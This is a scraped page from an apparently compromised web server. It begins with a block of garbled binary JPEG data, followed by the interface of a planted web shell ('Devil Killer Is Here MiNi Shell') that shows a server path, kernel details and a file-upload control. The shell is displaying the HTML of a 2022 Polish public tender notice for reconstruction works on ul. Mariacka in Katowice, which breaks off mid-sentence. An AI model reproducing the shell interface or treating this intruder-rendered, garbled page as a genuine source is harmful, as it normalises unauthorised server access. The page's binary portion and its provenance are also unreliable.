JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220608/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220608/0019860001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa, nadbudowa, rozbudowa i zmiana sposobu użytkowania pustostanów (dawnych bud. mieszkalnych z piwnicami<br/>i poddaszami nieużytkowymi) na cele mieszkaniowe z funkcjami techniczno-pomocniczymi </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">KATOWICKIE TOWARZYSTWO BUDOWNICTWA SPOŁECZNEGO SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 273437283</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Zygmunta Krasińskiego 14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Katowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">40-019</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@tbs.katowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.tbs.katowice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Wynajem i zarządzanie nieruchomościami własnymi lub dzierżawionymi SEKCJA II – INFORMACJE PODSTAWOWE </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa, nadbudowa, rozbudowa i zmiana sposobu użytkowania pustostanów (dawnych bud. mieszkalnych z piwnicami<br/>i poddaszami nieużytkowymi) na cele mieszkaniowe z funkcjami techniczno-pomocniczymi </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-235ed2f2-e6ec-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00198600</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/tbs_katowice <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/tbs_katowice</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne<br/>wysyłania i odbierania korespondencji elektronicznej<br/>przekazywanej przy ich użyciu, oraz innych czynności podejmowanych w niniejszym postępowaniu<br/>przy użyciu platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie<br/>internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/pn/tbs_katowice</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że: • administratorem Pani/Pana danych osobowych jest<br/>Zamawiający: Katowickie Towarzystwo Budownictwa Społecznego Sp. z o.o., ul. Krasińskiego 14, 40-<br/>019 Katowice (dane kontaktowe podane w rozdziale 2 SWZ)• w sprawach związanych z Pani/Pana<br/>danymi proszę kontaktować się z Inspektorem Ochrony Danych Zamawiającego, kontakt pisemny za<br/>pomocą poczty tradycyjnej na adres ul. Krasińskiego 14, 40-019 Katowice, pocztą elektroniczną naadres e-mail:<br/>iodo@tbs.katowice.pl • Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6<br/>ust. 1 lit. c RODO w celu prowadzenia przedmiotowego postępowania o udzielenie zamówienia<br/>publicznego oraz zawarcia umowy, a podstawą prawną ich przetwarzania jest obowiązek prawny<br/>stosowania sformalizowanych procedur udzielania zamówień publicznych spoczywający na<br/>Zamawiającym; • odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp; •<br/>Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat<br/>od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata, okres przechowywania obejmuje cały czas trwania umowy; • obowiązek podania przez<br/>Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie<br/>zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; • w<br/>odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO; • Posiada Pan/Pani: − na podstawie art. 15 RODO<br/>prawo dostępu do danych osobowych Pani/Pana dotyczących; − na podstawie art. 16 RODO prawo do<br/>sprostowania lub uzupełnienia Pani/Pana danych osobowych, przy czym skorzystanie z prawa do<br/>sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz<br/>nie może naruszać integralności protokołu oraz jego załączników. − na podstawie art. 18 RODO prawo<br/>żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania<br/>nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków<br/>ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne<br/>względy interesu publicznego Unii Europejskiej lub państwa członkowskiego, a także nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia. −<br/>prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1. nie przysługuje Pani/Panu: − w związku z art. 17 ust. 3 lit.<br/>b, d lub e RODO prawo do usunięcia danych osobowych; − prawo do przenoszenia danych osobowych,<br/>o którym mowa w art. 20 RODO; − na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania<br/>danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust.<br/>1 lit. c RODO. 2. Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku<br/>informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których dane przekazane<br/>zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio<br/>pozyska od wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej<br/>jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/5/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przebudowa, nadbudowa, rozbudowa i zmiana sposobu użytkowania pustostanów (dawnych budynków mieszkalnych z<br/>piwnicami i poddaszami nieużytkowymi) na cele mieszkaniowe z funkcjami techniczno-pomocniczymi oraz na funkcję<br/>usługową, wraz z przebudową strefy wejściowej i infrastrukturą techniczną przy ul. Mariackiej 30, 32, 34 w Katowicach. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45262700-8 - Przebudowa budynków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45211000-9 - Roboty budowlane w zakresie budownictwa wielorodzinnego i domów jednorodzinnych</p> <p class="mb-0">45262800-9 - Rozbudowa budynków</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45313100-5 - Instalowanie wind</p> <p class="mb-0">45343000-3 - Roboty instalacyjne przeciwpożarowe</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">22 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> I. Zamawiający określa następujące warunki udziału w postępowaniu dotyczące:<br/>1) zdolności technicznej lub zawodowej;<br/>Dla potwierdzenia spełnienia tego warunku wykonawca jest zobowiązany wykazać, że:<br/>„a) wykonał należycie w okresie ostatnich pięciu (5) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy - w tym okresie, co najmniej dwie (2) umowy na roboty budowlane, w rozumieniu ustawy Prawo<br/>budowlane (itp.3 pkt. 7) z których każda (odrębnie) spełnia łącznie wszystkie niniejsze warunki:<br/>- budowa, przebudowa, nadbudowa, rozbudowa budynku lub zespołu budynków w standardzie<br/>„deweloperskim” lub pod „klucz” i powierzchni użytkowej nie mniejszej niż 1000 m² oraz wartość<br/>robót budowlanych w zakresie umowy co najmniej 5.000.000 zł brutto (słownie: pięć milionów<br/>złotych brutto)<br/>* przez „umowę” rozumie się jeden kontrakt, w ramach którego wykonawca realizował roboty<br/>budowlane (wraz<br/>z ewentualnymi aneksami i zmianami)<br/>* przez „budowę, przebudowę, nadbudowę, rozbudowę” rozumie się wzniesienie obiektu od<br/>podstaw lub odbudowę, przebudowę , rozbudowę, nadbudowę istniejącego budynku<br/>* przez „powierzchnię użytkową” rozumie się powierzchnie budynku lub zespołu budynków<br/>wznoszonych ramach jednego kontraktu<br/>* przez „wartość robót budowlanych” rozumie się wartość wyłącznie robót budowlanych, bez<br/>usług, dostaw wyposażenia, itp. (jeśli wchodziły w zakres umowy)<br/>* przez „standard deweloperski” rozumie się wykonanie w obiekcie co najmniej prac<br/>obejmujących:<br/>- montaż ścian działowych,<br/>- montaż drzwi wejściowych do lokalu,<br/>- montaż okien z parapetami,<br/>- wykonanie podstawowych instalacji (elektrycznej zakończonej kostkami elektrycznymi,<br/>grzewczej wraz<br/>z grzejnikami, wodno-kanalizacyjnej z zaślepionymi podejściami, wentylacyjnej),<br/>- otynkowanie ścian i sufitów,<br/>- wykonanie wylewek podłogowych,<br/>bez konieczności wykonania wykończenia ścian i podłóg oraz dostarczenia i montażu<br/>elementów białego montażu<br/>* przez „standard pod klucz” rozumie się wykonanie w obiekcie co najmniej prac obejmujących:<br/>- wszystkie prace z zakresu standardu developerskiego,<br/>- wykonanie wylewek, montaż paneli podłogowych, wykończenie płytkami ceramicznymi /<br/>gresowymi, montaż listew wykończeniowych,<br/>- wykończenie ścian i sufitów tynkami przygotowanymi do malowania wraz z dwukrotnym<br/>pomalowaniem farbą akrylową w kolorze białym,<br/>- wykończenia ścian i posadzek pomieszczeń higieniczno-sanitarnych płytkami ceramicznymi /gresowymi ,<br/>- montaż osprzętu elektrycznego (gniazdka, łączniki, punkty oświetleniowe zakończone kostką),<br/>- montaż drzwi wewnętrznych<br/>bez konieczności umeblowania lokalu.””<br/>b) dysponuje lub będzie dysponował osobami, które będą uczestniczyć w realizacji zamówienia, w szczególności<br/>odpowiedzialnymi za świadczenie usług oraz kierowanie robotami budowlanymi, posiadającymi uprawnienia do<br/>wykonywania samodzielnych funkcji technicznych w budownictwie w rozumieniu ustawy Prawo budowlane, z których co<br/>najmniej:<br/> jedna (1) osoba (na stanowisko Kierownika Budowy) posiada uprawnienia budowlane do kierowania robotami budowlanymi<br/>w specjalności konstrukcyjno-budowlanej bez ograniczeń oraz posiada aktualne zaświadczenie o przynależności do<br/>właściwej izby zawodowej i co najmniej 5-letnie doświadczenie zawodowe w kierowaniu budową (liczone w odniesieniu do<br/>okresów rzeczywistego pełnienia przez tę osobą funkcji kierownika budowy; okresy „zazębiające się” nie będą liczone<br/>podwójnie),<br/> jedna (1) osoba (na stanowisko kierownika robót) posiada uprawnienia budowlane do kierowania robotami budowlanymi w<br/>specjalności drogowej bez ograniczeń oraz posiada aktualne zaświadczenie o przynależności do właściwej izby zawodowej,<br/> jedna (1) osoba (na stanowisko kierownika robót) posiada uprawnienia budowlane do kierowania robotami budowlanymi w<br/>specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i<br/>kanalizacyjnych bez ograniczeń oraz posiada aktualne zaświadczenie o przynależności do właściwej izby zawodowej,<br/> jedna (1) osoba (na stanowisko kierownika robót) posiada uprawnienia budowlane do kierowania robotami budowlanymi w<br/>specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń oraz<br/>posiada aktualne zaświadczenie o przynależności do właściwej izby zawodowej,<br/> jedna (1) osoba z aktualnymi uprawnieniami elektrycznymi do eksploatacji (E) instalacji sieci do 1kV i dozorowymi (D)<br/>instalacji sieci do 1kV.<br/>Zamawiający dopuszcza łączenie funkcji przez jedną osobę, jeśli będzie ona miała kwalifikacje do zajmowania większej<br/>ilości funkcji<br/>* przez „uprawnienia budowlane” rozumie się właściwe uprawnienia wydane na podstawie przepisów rozdziału 2 ustawy z<br/>dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2020 r. poz. 1333 z późn. zm.) lub odpowiadające im uprawnienia<br/>wydane na podstawie wcześniejszych aktów prawnych, o ile ich zakres jest tożsamy z uprawnieniami wydawanymi na<br/>podstawie obecnie obowiązujących przepisów.<br/>W przypadku specjalistów zagranicznych posiadających uprawnienia wydane poza terytorium RP wymaga się od<br/>wykonawcy, aby osoby te spełniały odpowiednie warunki opisane w art. 12a ustawy Prawo budowlane oraz pozostałych<br/>przepisów ww. ustawy, ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii<br/>Europejskiej (t.j. Dz.U. z 2020 poz. 220) oraz art. 20a ustawy z dn. 15.12.2000 r. o samorządach zawodowych architektów,<br/>inżynierów budownictwa oraz urbanistów (t.j.: Dz.U. z 2019 poz. 1117)<br/>2) sytuacji ekonomicznej i finansowej;<br/>Dla potwierdzenia spełnienia tego warunku wykonawca jest zobowiązany wykazać, że:<br/>a) posiada dodatni wynik finansowy netto w co najmniej dwóch z ostatnich trzech lat obrotowych,<br/>b) uzyskał wskaźnik bieżącej płynności w ostatnim roku obrotowym nie mniejszy niż 1,00 liczony jako stosunek sumy<br/>aktywów obrotowych do zobowiązań krótkoterminowych,<br/>c) posiada środki finansowe, względnie posiada zdolność kredytową potwierdzoną przez bank lub spółdzielczą kasę<br/>oszczędnościowo-kredytową w kwocie co najmniej 2.000.000,00 zł (słownie: dwa miliony złotych),<br/>d) posiada opłaconą polisę ubezpieczenia OC, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest<br/>ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na<br/>sumę ubezpieczenia co najmniej 2.000.000,00 zł (słownie: dwa miliony złotych). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">na<br/>wezwanie Zamawiającego, Wykonawca składa: 1. wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat<br/>przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich<br/>rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane według wzoru stanowiącego<br/>załącznik nr 3 do SWZ oraz z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane<br/>zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne<br/>odpowiednie dokumenty [w przypadku, gdy Zamawiający jest podmiotem, na rzecz którego roboty budowlane wskazane w wykazie,<br/>o którym mowa powyżej zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów określających czy te<br/>roboty budowlane zostały wykonane należycie]<br/>2.wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia, w szczególności odpowiedzialnych za świadczenie usług,<br/>kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień,<br/>doświadczenia i wykształcenia niezbędnych<br/>do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi osobami według wzoru stanowiącego załącznik nr 4 do SWZ<br/>3.sprawozdanie finansowego, w przypadku gdy sporządzenie sprawozdania wymagane jest przepisami kraju, w którym wykonawca<br/>ma siedzibę lub miejsce zamieszkania, a jeżeli podlega ono badaniu przez firmę audytorską zgodnie<br/>z przepisami o rachunkowości, również odpowiednio ze sprawozdaniem<br/>z badania sprawozdania finansowego, a w przypadku wykonawców niezobowiązanych do sporządzenia sprawozdania finansowego,<br/>innych dokumentów określających w szczególności przychody oraz aktywa<br/>i zobowiązania - za okres nie dłuższy niż ostatnie 3 lata obrotowe (2018-2020, a w przypadku gdy sprawozdanie za rok 2020 nie<br/>zostało jeszcze sporządzone, bądź nie zostało 